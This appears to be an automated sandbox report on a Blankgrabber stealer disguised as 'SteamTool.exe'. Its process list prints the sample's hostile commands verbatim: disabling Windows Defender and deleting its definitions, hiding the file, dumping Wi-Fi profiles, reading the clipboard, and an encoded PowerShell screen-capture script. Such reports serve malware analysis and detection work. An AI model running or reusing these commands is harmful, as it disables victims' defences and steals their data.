Analysis Overview
SHA256
1b113b3fc34dddb83d165a91e37bcf00afe61dbdf4be216e6ef518aeae7e47cf
Threat Level: Known bad
The file SteamTool.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
UPX packed file
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Hide Artifacts: Hidden Files and Directories
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Modifies registry class
Views/modifies file attributes
Enumerates processes with tasklist
Gathers system information
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Detects videocard installed
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-19 21:40
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 21:40
Reported
2024-06-19 21:45
Platform
win11-20240508-en
Max time kernel
283s
Max time network
285s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SteamTool.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SteamTool.exe
"C:\Users\Admin\AppData\Local\Temp\SteamTool.exe"
C:\Users\Admin\AppData\Local\Temp\SteamTool.exe
"C:\Users\Admin\AppData\Local\Temp\SteamTool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SteamTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SteamTool.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SteamTool.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SteamTool.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAH